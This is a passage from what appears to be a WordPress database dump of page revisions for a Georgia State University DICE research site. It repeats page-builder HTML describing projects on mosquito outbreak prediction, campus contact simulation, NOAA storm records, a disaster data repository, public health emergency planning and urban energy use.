plans capable of addressing specific hazards.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Publications','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:17:51','2023-09-29 14:17:51','',126,'https://gsudice.dataconn.net/?p=1423',0,'revision','',0),(1424,1,'2023-09-29 10:18:03','2023-09-29 14:18:03','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n            <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n                      are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n                      of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n            <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n                      this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">The DICE Data Repository </h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\r\n                      <br>\r\n                    </p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Orpheus</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:18:03','2023-09-29 14:18:03','',126,'https://gsudice.dataconn.net/?p=1424',0,'revision','',0),(1425,1,'2023-09-29 10:18:14','2023-09-29 14:18:14','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n            <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n                      are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n                      of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n            <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n                      this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        